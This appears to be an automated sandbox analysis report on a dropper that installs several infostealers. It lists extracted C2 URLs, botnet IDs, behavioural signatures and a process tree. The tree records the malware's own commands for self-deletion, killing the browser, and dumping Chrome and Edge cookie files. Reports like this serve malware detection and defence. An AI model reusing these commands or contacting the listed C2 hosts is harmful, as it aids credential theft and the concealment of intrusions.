Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    139s
  • max time network
    1814s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    29-07-2021 21:43

General

  • Target

    8 (19).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

forinstalls

C2

77.220.213.35:52349

Extracted

Family

vidar

Version

39.8

Botnet

932

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    932

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

b2f4d9fe1388d8fb99e44879db3e1a785afcac9d

Attributes
  • url4cnc

    https://t.me/uidsoyaada

rc4.plain
rc4.plain

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 5 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 63 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 22 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies data under HKEY_USERS 34 IoCs
  • Modifies registry class 23 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:356
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2400
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2380
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2720
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
              PID:2708
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
                PID:2608
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1924
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1448
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                    1⤵
                      PID:1340
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                      1⤵
                        PID:1180
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                        1⤵
                          PID:1128
                        • C:\Users\Admin\AppData\Local\Temp\8 (19).exe
                          "C:\Users\Admin\AppData\Local\Temp\8 (19).exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4440
                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:4940
                            • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\setup_install.exe
                              "C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\setup_install.exe"
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of WriteProcessMemory
                              PID:5080
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_2.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:768
                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_2.exe
                                  sonia_2.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: MapViewOfSection
                                  PID:3164
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_3.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4032
                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_3.exe
                                  sonia_3.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Modifies system certificate store
                                  PID:3332
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3332 -s 928
                                    6⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:648
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_4.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4004
                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_4.exe
                                  sonia_4.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4212
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_5.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4108
                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_5.exe
                                  sonia_5.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  PID:4236
                                  • C:\Users\Admin\Documents\ecd46TW_RRndCFkBv_zUKUeM.exe
                                    "C:\Users\Admin\Documents\ecd46TW_RRndCFkBv_zUKUeM.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Checks processor information in registry
                                    PID:1864
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /im ecd46TW_RRndCFkBv_zUKUeM.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\ecd46TW_RRndCFkBv_zUKUeM.exe" & del C:\ProgramData\*.dll & exit
                                      7⤵
                                        PID:5904
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /im ecd46TW_RRndCFkBv_zUKUeM.exe /f
                                          8⤵
                                          • Kills process with taskkill
                                          PID:2100
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /t 6
                                          8⤵
                                          • Delays execution with timeout.exe
                                          PID:6080
                                    • C:\Users\Admin\Documents\4aivIkC_DuvaliW8XQgJAJIj.exe
                                      "C:\Users\Admin\Documents\4aivIkC_DuvaliW8XQgJAJIj.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:4808
                                      • C:\Users\Admin\Documents\4aivIkC_DuvaliW8XQgJAJIj.exe
                                        "C:\Users\Admin\Documents\4aivIkC_DuvaliW8XQgJAJIj.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: MapViewOfSection
                                        PID:3572
                                    • C:\Users\Admin\Documents\i7kjLDXDPMxjDkwSiRCym7NS.exe
                                      "C:\Users\Admin\Documents\i7kjLDXDPMxjDkwSiRCym7NS.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:2736
                                      • C:\Users\Admin\Documents\i7kjLDXDPMxjDkwSiRCym7NS.exe
                                        C:\Users\Admin\Documents\i7kjLDXDPMxjDkwSiRCym7NS.exe
                                        7⤵
                                        • Executes dropped EXE
                                        PID:4440
                                      • C:\Users\Admin\Documents\i7kjLDXDPMxjDkwSiRCym7NS.exe
                                        C:\Users\Admin\Documents\i7kjLDXDPMxjDkwSiRCym7NS.exe
                                        7⤵
                                        • Executes dropped EXE
                                        PID:3924
                                    • C:\Users\Admin\Documents\yzOKgCRw3QC0Aa98oLKgjc8a.exe
                                      "C:\Users\Admin\Documents\yzOKgCRw3QC0Aa98oLKgjc8a.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3788
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c taskkill /f /im chrome.exe
                                        7⤵
                                          PID:5532
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /im chrome.exe
                                            8⤵
                                            • Kills process with taskkill
                                            PID:5708
                                      • C:\Users\Admin\Documents\k9EsRLnpAJSLXCoB8dRGJb4X.exe
                                        "C:\Users\Admin\Documents\k9EsRLnpAJSLXCoB8dRGJb4X.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2828
                                        • C:\Users\Admin\Documents\k9EsRLnpAJSLXCoB8dRGJb4X.exe
                                          "C:\Users\Admin\Documents\k9EsRLnpAJSLXCoB8dRGJb4X.exe"
                                          7⤵
                                            PID:3804
                                          • C:\Users\Admin\Documents\k9EsRLnpAJSLXCoB8dRGJb4X.exe
                                            "C:\Users\Admin\Documents\k9EsRLnpAJSLXCoB8dRGJb4X.exe"
                                            7⤵
                                              PID:2544
                                          • C:\Users\Admin\Documents\Cdc1Veaep673EHU0GYPa5KNB.exe
                                            "C:\Users\Admin\Documents\Cdc1Veaep673EHU0GYPa5KNB.exe"
                                            6⤵
                                              PID:1936
                                              • C:\Users\Admin\Documents\Cdc1Veaep673EHU0GYPa5KNB.exe
                                                "C:\Users\Admin\Documents\Cdc1Veaep673EHU0GYPa5KNB.exe" -a
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4844
                                            • C:\Users\Admin\Documents\SgY4WYMjK7hPbP_HMDFZt_6I.exe
                                              "C:\Users\Admin\Documents\SgY4WYMjK7hPbP_HMDFZt_6I.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:2704
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                • Executes dropped EXE
                                                PID:5012
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                7⤵
                                                • Executes dropped EXE
                                                PID:3336
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                • Executes dropped EXE
                                                PID:5424
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                7⤵
                                                • Executes dropped EXE
                                                PID:5468
                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4828
                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                7⤵
                                                • Executes dropped EXE
                                                PID:208
                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                • Executes dropped EXE
                                                PID:5000
                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                7⤵
                                                • Executes dropped EXE
                                                PID:5044
                                            • C:\Users\Admin\Documents\UP9rNg_boddh6h_Fp1BCAzzg.exe
                                              "C:\Users\Admin\Documents\UP9rNg_boddh6h_Fp1BCAzzg.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1740
                                            • C:\Users\Admin\Documents\8zrMrnNTI61n2KQLib34uYay.exe
                                              "C:\Users\Admin\Documents\8zrMrnNTI61n2KQLib34uYay.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:1572
                                              • C:\Users\Admin\Documents\8zrMrnNTI61n2KQLib34uYay.exe
                                                C:\Users\Admin\Documents\8zrMrnNTI61n2KQLib34uYay.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:1584
                                            • C:\Users\Admin\Documents\1J7YYOXHR2JClJJsbO9us0aP.exe
                                              "C:\Users\Admin\Documents\1J7YYOXHR2JClJJsbO9us0aP.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:1876
                                              • C:\Users\Admin\Documents\1J7YYOXHR2JClJJsbO9us0aP.exe
                                                "C:\Users\Admin\Documents\1J7YYOXHR2JClJJsbO9us0aP.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4288
                                              • C:\Users\Admin\Documents\1J7YYOXHR2JClJJsbO9us0aP.exe
                                                "C:\Users\Admin\Documents\1J7YYOXHR2JClJJsbO9us0aP.exe"
                                                7⤵
                                                  PID:5292
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    8⤵
                                                    • Executes dropped EXE
                                                    PID:504
                                                • C:\Users\Admin\Documents\1J7YYOXHR2JClJJsbO9us0aP.exe
                                                  "C:\Users\Admin\Documents\1J7YYOXHR2JClJJsbO9us0aP.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5288
                                              • C:\Users\Admin\Documents\NxYisKK5BlU7C37Osubs0Fzp.exe
                                                "C:\Users\Admin\Documents\NxYisKK5BlU7C37Osubs0Fzp.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:4400
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                  7⤵
                                                    PID:2688
                                                • C:\Users\Admin\Documents\tDHMVrniHovzZ4FWVuySaN8k.exe
                                                  "C:\Users\Admin\Documents\tDHMVrniHovzZ4FWVuySaN8k.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2856
                                                  • C:\Users\Admin\AppData\Roaming\4940765.exe
                                                    "C:\Users\Admin\AppData\Roaming\4940765.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:1380
                                                    • C:\Windows\system32\WerFault.exe
                                                      C:\Windows\system32\WerFault.exe -u -p 1380 -s 1888
                                                      8⤵
                                                      • Program crash
                                                      PID:4960
                                                  • C:\Users\Admin\AppData\Roaming\6920954.exe
                                                    "C:\Users\Admin\AppData\Roaming\6920954.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    PID:3644
                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:652
                                                  • C:\Users\Admin\AppData\Roaming\3492651.exe
                                                    "C:\Users\Admin\AppData\Roaming\3492651.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:3976
                                                • C:\Users\Admin\Documents\hLI7GZ96QNZ7gDAqRHAFo4Pr.exe
                                                  "C:\Users\Admin\Documents\hLI7GZ96QNZ7gDAqRHAFo4Pr.exe"
                                                  6⤵
                                                    PID:3264
                                                    • C:\Users\Admin\Documents\hLI7GZ96QNZ7gDAqRHAFo4Pr.exe
                                                      C:\Users\Admin\Documents\hLI7GZ96QNZ7gDAqRHAFo4Pr.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:5504
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5504 -s 1436
                                                        8⤵
                                                        • Program crash
                                                        PID:2236
                                                    • C:\Users\Admin\Documents\hLI7GZ96QNZ7gDAqRHAFo4Pr.exe
                                                      C:\Users\Admin\Documents\hLI7GZ96QNZ7gDAqRHAFo4Pr.exe
                                                      7⤵
                                                        PID:5496
                                                    • C:\Users\Admin\Documents\up_9XpouPTDnfkXi9m6sCKXC.exe
                                                      "C:\Users\Admin\Documents\up_9XpouPTDnfkXi9m6sCKXC.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2332
                                                      • C:\Users\Admin\Documents\up_9XpouPTDnfkXi9m6sCKXC.exe
                                                        C:\Users\Admin\Documents\up_9XpouPTDnfkXi9m6sCKXC.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5512
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 24
                                                          8⤵
                                                          • Program crash
                                                          PID:5576
                                                    • C:\Users\Admin\Documents\c5c8P3itSOM1vcUEBcS_v51i.exe
                                                      "C:\Users\Admin\Documents\c5c8P3itSOM1vcUEBcS_v51i.exe"
                                                      6⤵
                                                        PID:2688
                                                        • C:\Users\Admin\Documents\c5c8P3itSOM1vcUEBcS_v51i.exe
                                                          C:\Users\Admin\Documents\c5c8P3itSOM1vcUEBcS_v51i.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:4956
                                                      • C:\Users\Admin\Documents\Bj4mmHX_RFiN7cfcRttus0Y_.exe
                                                        "C:\Users\Admin\Documents\Bj4mmHX_RFiN7cfcRttus0Y_.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:1464
                                                        • C:\Users\Admin\Documents\Bj4mmHX_RFiN7cfcRttus0Y_.exe
                                                          "C:\Users\Admin\Documents\Bj4mmHX_RFiN7cfcRttus0Y_.exe"
                                                          7⤵
                                                            PID:4248
                                                          • C:\Users\Admin\Documents\Bj4mmHX_RFiN7cfcRttus0Y_.exe
                                                            "C:\Users\Admin\Documents\Bj4mmHX_RFiN7cfcRttus0Y_.exe"
                                                            7⤵
                                                              PID:5176
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                8⤵
                                                                  PID:2796
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                    9⤵
                                                                      PID:6140
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                    8⤵
                                                                      PID:6036
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff9d3924f50,0x7ff9d3924f60,0x7ff9d3924f70
                                                                        9⤵
                                                                          PID:6096
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1712,15964603912942533648,7959451434192158931,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1732 /prefetch:2
                                                                          9⤵
                                                                            PID:5940
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1712,15964603912942533648,7959451434192158931,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1992 /prefetch:8
                                                                            9⤵
                                                                              PID:3248
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1712,15964603912942533648,7959451434192158931,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2524 /prefetch:1
                                                                              9⤵
                                                                                PID:216
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1712,15964603912942533648,7959451434192158931,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2532 /prefetch:1
                                                                                9⤵
                                                                                  PID:1880
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1712,15964603912942533648,7959451434192158931,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1780 /prefetch:8
                                                                                  9⤵
                                                                                    PID:2880
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1712,15964603912942533648,7959451434192158931,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
                                                                                    9⤵
                                                                                      PID:4956
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1712,15964603912942533648,7959451434192158931,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
                                                                                      9⤵
                                                                                        PID:3676
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1712,15964603912942533648,7959451434192158931,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:1
                                                                                        9⤵
                                                                                          PID:6216
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1712,15964603912942533648,7959451434192158931,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1
                                                                                          9⤵
                                                                                            PID:6244
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1712,15964603912942533648,7959451434192158931,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8
                                                                                            9⤵
                                                                                              PID:6792
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1712,15964603912942533648,7959451434192158931,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:8
                                                                                              9⤵
                                                                                                PID:7128
